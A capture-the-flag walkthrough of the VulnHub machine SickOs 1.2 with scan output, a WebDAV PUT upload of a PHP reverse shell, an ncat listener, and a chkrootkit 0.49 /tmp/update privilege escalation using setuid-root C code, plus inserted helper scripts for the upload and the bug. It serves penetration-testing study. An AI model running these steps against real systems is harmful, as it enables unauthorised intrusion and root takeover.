SickOs 1.2 Walkthrough

You can find SickOs 1.2 on VulnHub.

Quick run-down:

  1. Service enumeration
  2. Check for any vulnerabilities
  3. Escalate to Root
  4. Get our flag

Exploit used:

  1. chkrootkit 0.49 (the /tmp/update local privilege escalation)

After finding the target on my network, I ran a full-port Nmap scan against it to see what services are running. Only 22 and 80 are open; every other port is filtered, which is also why Nmap warns that its OS guess is unreliable. I see port 80 open, so I head to the web page to see what it has in store for me.

# nmap -A -p- 192.168.126.129

Starting Nmap 7.12 ( https://nmap.org ) at 2016-04-29 01:54 EDT
Nmap scan report for 192.168.126.129
Host is up (0.00046s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
|   2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_  256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open  http    lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:16:EB:35 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.1, Linux 3.16 - 3.19, Linux 3.2 - 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms 192.168.126.129

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.70 seconds

I was greeted with a meme. As a side note, this is what my resting face looks like.

Inspecting the page source didn't reveal anything obvious to me, so I downloaded the image to see if anything was hidden inside it. No fruit.

As I was poking around, I ran a dirb scan against the site to see if anything fruitful would come out of it. A few seconds later, I had learned there is a "/test/" directory. Su-WEET! I also ran a Nikto scan; it turned up nothing, but that is definitely a-okay.

# dirb http://192.168.126.129 /usr/share/wordlists/dirb/common.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Apr 29 05:20:45 2016
URL_BASE: http://192.168.126.129/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.126.129/ ----
+ http://192.168.126.129/index.php (CODE:200|SIZE:163)
==> DIRECTORY: http://192.168.126.129/test/

---- Entering directory: http://192.168.126.129/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Fri Apr 29 05:20:47 2016
DOWNLOADED: 4612 - FOUND: 1

Let’s take a look at what is in /test/

Here is where it took me a little while. I searched Exploit-DB for lighttpd and Google for lighttpd 1.4.28 exploits. There were some older vulnerabilities, but none for the version I was looking at. I banged my head a few times wondering whether I had missed something simple, BUT I WAS FINDING NOTHING.

I looked at the page source and that had nothing either. How fun. I decided to see what happens if I send a GET request by hand with Netcat. The beauty of that was that after entering the request, it would just hang. Grrrrrr…

Next I fired up Burp Suite to see if at least THAT would capture something. It did, but nothing too crazy or out of the norm. I also wanted to send different kinds of requests, not just watch them. What else can make requests? I turned to cURL and read the help.

Finally!! I grabbed something interesting using cURL. The awesome thing was that with -X I could choose the request method, and an OPTIONS request makes the server list the methods it accepts for that path.

# curl -X OPTIONS -v http://192.168.126.129/test/
*   Trying 192.168.126.129...
* Connected to 192.168.126.129 (192.168.126.129) port 80 (#0)
> OPTIONS /test/ HTTP/1.1
> Host: 192.168.126.129
> User-Agent: curl/7.47.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Allow: OPTIONS, GET, HEAD, POST
< Content-Length: 0
< Date: Fri, 29 Apr 2016 09:41:19 GMT
< Server: lighttpd/1.4.28
< 
* Connection #0 to host 192.168.126.129 left intact

I immediately noticed "PUT" (the DAV: 1,2 and MS-Author-Via: DAV headers confirm this is a WebDAV collection). So I uploaded a test file to see if it would work. It didn't upload at first, so I tried again using "HTTP/1.0". That worked with great success. The likely cause of the first failure is that curl adds an Expect: 100-continue header to an HTTP/1.1 PUT, which lighttpd 1.4.28 rejects with 417 Expectation Failed; HTTP/1.0 has no Expect handshake, and passing -H 'Expect:' to curl has the same effect without downgrading the protocol.

# curl --upload-file test.txt -v --url http://192.168.126.129/test/test.txt --http1.0
*   Trying 192.168.126.129...
* Connected to 192.168.126.129 (192.168.126.129) port 80 (#0)
> PUT /test/test.txt HTTP/1.0
> Host: 192.168.126.129
> User-Agent: curl/7.47.0
> Accept: */*
> Content-Length: 5
> 
* We are completely uploaded and fine
* HTTP 1.0, assume close after body
< HTTP/1.0 201 Created
< Content-Length: 0
< Connection: close
< Date: Fri, 29 Apr 2016 09:45:42 GMT
< Server: lighttpd/1.4.28
< 
* Closing connection 0
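The two-step check above (OPTIONS to learn which methods the collection accepts, then a PUT that avoids the Expect handshake) as a small POSIX shell helper. This is an added example, not code from the original write-up: the function names, the embedded sample response (constructed to match the shape of the OPTIONS reply shown above) and the choice of `-H 'Expect:'` instead of `--http1.0` are my own.

```shell
#!/bin/sh
# Added example: probe a WebDAV collection for PUT and upload a file.
# Assumes curl is installed. Live use needs network access to the target;
# the sample response below lets the parsing part run offline.

# Constructed sample, shaped like the lighttpd 1.4.28 reply in the write-up.
SAMPLE_OPTIONS='HTTP/1.1 200 OK
DAV: 1,2
MS-Author-Via: DAV
Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
Allow: OPTIONS, GET, HEAD, POST
Content-Length: 0
Server: lighttpd/1.4.28
'

# dav_methods RESPONSE: print every method named in the Allow: headers, one per
# line, sorted and de-duplicated. lighttpd splits them over two Allow: lines, so
# all of them are merged rather than reading only the first.
dav_methods() {
    printf '%s\n' "$1" \
      | tr -d '\r' \
      | sed -n 's/^[Aa]llow:[[:space:]]*//p' \
      | tr ',' '\n' \
      | tr -d ' ' \
      | grep -v '^$' \
      | sort -u
}

# dav_allows RESPONSE METHOD: succeed if METHOD is advertised.
dav_allows() {
    dav_methods "$1" | grep -qx "$2"
}

# dav_options URL: fetch the raw OPTIONS response (status line + headers).
dav_options() {
    curl -s -i -X OPTIONS "$1"
}

# dav_put LOCALFILE URL: upload with PUT. "-H 'Expect:'" removes curl's
# Expect: 100-continue header, which this lighttpd version answers with 417;
# --http1.0, as used in the write-up, achieves the same thing. Prints the
# status code and succeeds on 201 (created) or 204 (existing file replaced).
dav_put() {
    code=$(curl -s -o /dev/null -w '%{http_code}' \
             -H 'Expect:' --upload-file "$1" "$2") || code=000
    printf '%s\n' "$code"
    [ "$code" = "201" ] || [ "$code" = "204" ]
}

# Usage: sh dav_put.sh http://TARGET/test/ localfile   (live, needs network)
if [ "$#" -eq 2 ]; then
    resp=$(dav_options "$1")
    dav_methods "$resp"
    dav_allows "$resp" PUT && dav_put "$2" "${1%/}/$(basename "$2")"
else
    printf 'methods in the sample response: %s\n' \
        "$(dav_methods "$SAMPLE_OPTIONS" | tr '\n' ' ')"
fi
```

A 201 on the PUT is the real test; an advertised method can still be refused by a per-directory rule, so treat the OPTIONS output as a hint of what to try, not proof.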

What next, you may ask? Well, let me tell you! I turned to my handy-dandy php-reverse-shell, uploaded it into /test/ the same way, and requested it in the browser. Using the default port number wouldn't work, so I changed it to port 443 (this box evidently restricts outbound connections, and 443 is a port egress filters usually allow). I set up my listener, browsed to my shell, and voila! I caught a shell!

# ncat -nlvp 443
Ncat: Version 7.12 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 192.168.126.129.
Ncat: Connection from 192.168.126.129:50915.
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 athlon i386 GNU/Linux
 02:55:29 up  4:36,  0 users,  load average: 0.03, 0.07, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty ; pty.spawn("/bin/bash")'
www-data@ubuntu:/$ 

After enumerating the machine, we can see that there is a "chkrootkit" job inside cron.daily, and the interesting thing is that the installed version is 0.49. According to Exploit-DB, if you place a file called "update" in /tmp, chkrootkit will run it, and since the cron job runs chkrootkit as root, so does the payload. The bug (CVE-2014-0476, fixed in 0.50) sits in the slapper() check: the line `file_port=$file_port $i` is unquoted, so the shell parses it as running the command $i with a throwaway environment assignment in front of it, and $i walks a list of paths that includes ${ROOTDIR}tmp/update. Two things worth confirming before relying on it: `ls -l /etc/cron.daily/chkrootkit` for the job, and `chkrootkit -V` for the version. The update file also has to be executable, or the exec simply fails. Very nice.

Sooo…let’s escalate our privs!

First thing I did was write a little, stupid-simple program that calls setgid(0) and setuid(0) and then spawns a shell. Then I use update to make that simple, yet deadly, binary root-owned and setuid so I can run it >:D The order in the script matters: chown first, then chmod u+s, because changing the owner of a file clears a setuid bit that is already set.

If all goes well, I will now have a simple tool of mass destruction waiting for me in /tmp.

www-data@ubuntu:/tmp$ cat > root.c << 'EOF'
> #include <unistd.h>
>
> int main(void)
> {
>     /* the binary is setuid root, so euid is 0 here; make it the real ids too */
>     setgid(0);
>     setuid(0);
>     execl("/bin/sh", "sh", (char *)NULL);
>     return 1;   /* only reached if execl fails */
> }
> EOF
www-data@ubuntu:/tmp$ gcc root.c -o rootme
www-data@ubuntu:/tmp$ cat > update << 'EOF'
> #!/bin/bash
>
> chown root /tmp/rootme
> chgrp root /tmp/rootme
> chmod u+s /tmp/rootme
> EOF
www-data@ubuntu:/tmp$ chmod +x update
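Why an executable file named update is all chkrootkit 0.49 needs, and why the chmod +x above matters, as an added example that is not part of the original post and is not chkrootkit's code verbatim: it paraphrases the faulty loop from the 0.49 slapper() test and runs it against a scratch directory (standing in for chkrootkit's ROOTDIR prefix) with a payload that only records which user ran it, instead of touching the real /tmp or setting a setuid bit. The function names and the scratch layout are my own.

```shell
#!/bin/sh
# Added example: reproduce the chkrootkit 0.49 "update" execution bug
# (CVE-2014-0476) harmlessly. Paraphrased from the slapper() loop in 0.49;
# not the write-up's code and not the chkrootkit source verbatim.

# The loop as 0.49 has it. file_port starts empty, and the line that was
# meant to append $i to it is parsed by the shell as: run the command "$i"
# with a temporary environment assignment file_port="". Every existing file
# in the list therefore gets executed. Under root's cron job, that is as root.
# The 0.50 fix is simply the quoted form:  file_port="$file_port $i"
vulnerable_slapper_check() {
    ROOTDIR=$1      # chkrootkit's -r prefix; "/" on a normal run
    SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c \
        ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd ${ROOTDIR}tmp/update \
        ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b"
    STATUS=0
    file_port=
    for i in ${SLAPPER_FILES}; do
        if [ -f "${i}" ]; then
            file_port=$file_port $i      # BUG: executes $i instead of appending
            STATUS=1
        fi
    done
    return $STATUS                        # 1 means "infected" to chkrootkit
}

# make_scratch_root: build DIR/tmp/update whose only action is to record the
# user it ran as, and print DIR. chmod +x is required, exactly as in the
# write-up: without it the exec fails with "Permission denied".
make_scratch_root() {
    d=$(mktemp -d)
    mkdir "$d/tmp"
    printf '#!/bin/sh\nid -un > "%s/marker"\n' "$d" > "$d/tmp/update"
    chmod +x "$d/tmp/update"
    printf '%s\n' "$d"
}

# demo_update_execution: run the faulty loop against a fresh scratch root.
# Prints the user name the payload recorded and returns 0 if tmp/update was
# executed; returns 1 if nothing ran. Cleans up the scratch directory.
demo_update_execution() {
    d=$(make_scratch_root)
    # The check reports "infected" (returns 1); only the side effect matters.
    vulnerable_slapper_check "$d/" >/dev/null 2>&1 || :
    if [ -f "$d/marker" ]; then
        cat "$d/marker"
        rm -rf "$d"
        return 0
    fi
    rm -rf "$d"
    return 1
}

if u=$(demo_update_execution); then
    echo "tmp/update was executed by the slapper() loop as user: $u"
else
    echo "tmp/update was not executed"
fi
```

Run it as an unprivileged user and the marker names that user; run it from root's cron, as on this box, and the same line runs the payload as root, which is the whole privilege escalation.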

Now, after waiting a minute or so, it's time to check! (A cron.daily job would normally take up to a day to fire, so if nothing happens, look at the actual schedule in /etc/crontab.)

www-data@ubuntu:/tmp$ ls -al
total 36
--snip--
-rwsrwxrwx  1 root    root    7235 Apr 29 05:16 rootme

Great success!!

All there is to do now is run ./rootme for a root shell, navigate to /root and retrieve our flag!!

root@ubuntu:/root# cat *.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.

Thanks for giving this try.

@vulnhub: Thanks for hosting this UP!.

This was an awesome, frustrating, and amazing VM brought to you by D4rk! Thanks man!! That was a great one and I hope to see more coming!

Source: ch3rn0byl